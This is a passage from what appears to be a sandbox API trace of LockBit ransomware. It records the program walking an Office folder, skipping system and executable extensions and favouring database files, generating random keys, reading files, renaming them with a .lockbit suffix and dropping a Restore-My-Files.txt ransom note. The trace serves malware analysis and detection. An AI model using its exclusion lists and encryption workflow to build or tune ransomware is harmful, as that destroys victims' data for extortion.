lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.776] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.776] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF.lockbit") returned 79 [0200.776] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18215_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.777] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.777] malloc (_Size=0x40068) returned 0x3df0008 [0200.777] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1700) returned 1 [0200.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.778] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.781] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.781] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.782] free (_Block=0x1fa2ed8) [0200.782] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18215_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.782] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.782] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cab3c00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3cab3c00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0x726, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18216_.WMF", cAlternateFileName="")) returned 1 [0200.782] lstrcmpiW (lpString1=".", lpString2="BD18216_.WMF") returned -1 [0200.782] lstrcmpiW (lpString1="..", lpString2="BD18216_.WMF") returned -1 [0200.782] PathFindExtensionW (pszPath="BD18216_.WMF") returned=".WMF" [0200.782] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.782] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.782] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.782] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.783] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.783] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18216_.WMF") returned 1 [0200.784] lstrcmpiW (lpString1="ntldr", lpString2="BD18216_.WMF") returned 1 [0200.784] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18216_.WMF") returned 1 [0200.784] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18216_.WMF") returned 1 [0200.784] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18216_.WMF") returned -1 [0200.784] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18216_.WMF") returned 1 [0200.784] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18216_.WMF") returned 1 [0200.784] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.784] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF") returned=".WMF" [0200.784] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.784] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.784] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.785] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.785] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF.lockbit") returned 79 [0200.785] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18216_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0200.786] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.786] malloc (_Size=0x40068) returned 0x3d70450 [0200.786] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1830) returned 1 [0200.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0200.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0200.787] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.791] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.791] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.792] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.793] free (_Block=0x1fa2ed8) [0200.793] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18216_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.793] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.793] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded1d00, ftCreationTime.dwHighDateTime=0x1bdcf1b, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7ded1d00, ftLastWriteTime.dwHighDateTime=0x1bdcf1b, nFileSizeHigh=0x0, nFileSizeLow=0x1552, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18217_.WMF", cAlternateFileName="")) returned 1 [0200.793] lstrcmpiW (lpString1=".", lpString2="BD18217_.WMF") returned -1 [0200.793] lstrcmpiW (lpString1="..", lpString2="BD18217_.WMF") returned -1 [0200.793] PathFindExtensionW (pszPath="BD18217_.WMF") returned=".WMF" [0200.793] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.793] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.794] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.795] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.795] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18217_.WMF") returned 1 [0200.796] lstrcmpiW (lpString1="ntldr", lpString2="BD18217_.WMF") returned 1 [0200.796] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18217_.WMF") returned 1 [0200.796] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18217_.WMF") returned 1 [0200.796] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18217_.WMF") returned -1 [0200.796] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18217_.WMF") returned 1 [0200.796] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18217_.WMF") returned 1 [0200.796] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.796] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF") returned=".WMF" [0200.796] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.796] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.796] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.797] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.797] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF.lockbit") returned 79 [0200.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18217_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0200.812] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.812] malloc (_Size=0x40068) returned 0x3df0008 [0200.812] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5458) returned 1 [0200.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.813] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.816] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.816] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.817] free (_Block=0x1fa2ed8) [0200.817] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18217_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.817] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.817] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fcec000, ftCreationTime.dwHighDateTime=0x1bdcf1b, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8fcec000, ftLastWriteTime.dwHighDateTime=0x1bdcf1b, nFileSizeHigh=0x0, nFileSizeLow=0x1212, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18218_.WMF", cAlternateFileName="")) returned 1 [0200.817] lstrcmpiW (lpString1=".", lpString2="BD18218_.WMF") returned -1 [0200.818] lstrcmpiW (lpString1="..", lpString2="BD18218_.WMF") returned -1 [0200.818] PathFindExtensionW (pszPath="BD18218_.WMF") returned=".WMF" [0200.818] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.818] lstrcmpiW (lpString1=".diagcab", 